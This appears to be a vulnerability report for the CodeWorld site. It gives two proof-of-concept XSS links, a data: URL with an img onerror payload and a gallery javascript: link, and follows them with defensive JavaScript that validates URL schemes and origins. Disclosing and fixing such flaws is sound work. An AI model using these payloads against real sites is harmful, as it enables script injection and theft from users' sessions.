I'm not sure what's considered a risk; maybe this is allowed. Also, the security policy for this repo is https://github.com/google/codeworld/security/policy and Google probably won't respond to reported issues.
It seems code is normally run in a sandboxed iframe (#1193), but you can still get XSS via a link.
https://code.world/doc.html?path=data:text/html,%3Cimg%20src%20onerror=%22alert(window.origin)%22%3E%3C/img%3E
https://code.world/gallery.html?path=data:text/html,%7B%22items%22:%5B%7B%22name%22:%22Click%20me%22,%22url%22:%22javascript:alert(window.origin)%22%7D%5D%7D (Needs click but no embed protection)
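One way to close both links in the report, as an added example that is not CodeWorld's code: resolve the `path` value with the URL parser and accept only same-origin http(s) results, and drop gallery items whose `url` is not http(s). It assumes, from the two URLs above, that `doc.html` and `gallery.html` fetch whatever `path` names and that the gallery JSON has the shape `{"items":[{"name","url"}]}`; the function names and `PAGE_ORIGIN` are hypothetical.

```javascript
// Added example: function names and PAGE_ORIGIN are assumptions, not CodeWorld code.
const PAGE_ORIGIN = 'https://code.world';

// Parse a value against a base URL; returns a URL object or null.
// Using the URL parser (not a regex) also normalizes leading spaces and
// embedded tabs/newlines that would otherwise hide a scheme.
function parse(value, base) {
  if (typeof value !== 'string' || value === '') return null;
  try { return new URL(value, base); } catch (e) { return null; }
}

// `path` query value -> same-origin http(s) URL string, or null.
// Absolute inputs such as data: or //other-host ignore the base and fail here.
function resolveSameOriginPath(path, base = PAGE_ORIGIN + '/doc.html') {
  const url = parse(path, base);
  if (!url || (url.protocol !== 'https:' && url.protocol !== 'http:')) return null;
  return url.origin === new URL(base).origin ? url.href : null;
}

// Gallery item link -> http(s) URL string safe to place in an href, or null.
function safeLinkHref(value, base = PAGE_ORIGIN + '/gallery.html') {
  const url = parse(value, base);
  return url && (url.protocol === 'https:' || url.protocol === 'http:') ? url.href : null;
}

// Keep only well-formed gallery items whose link passes the scheme check.
function sanitizeGalleryItems(doc) {
  const items = doc && Array.isArray(doc.items) ? doc.items : [];
  return items
    .filter((it) => it && typeof it.name === 'string')
    .map((it) => ({ name: it.name, url: safeLinkHref(it.url) }))
    .filter((it) => it.url !== null);
}

// The two decoded `path` values from the report, run through the checks.
const reportedDocPath = 'data:text/html,<img src onerror="alert(window.origin)"></img>';
const reportedGallery = { items: [{ name: 'Click me', url: 'javascript:alert(window.origin)' }] };
console.log(resolveSameOriginPath(reportedDocPath)); // rejected
console.log(sanitizeGalleryItems(reportedGallery));  // item dropped
```

The "no embed protection" remark is a separate response-header matter (`Content-Security-Policy: frame-ancestors` or `X-Frame-Options`) that client-side checks like these do not cover.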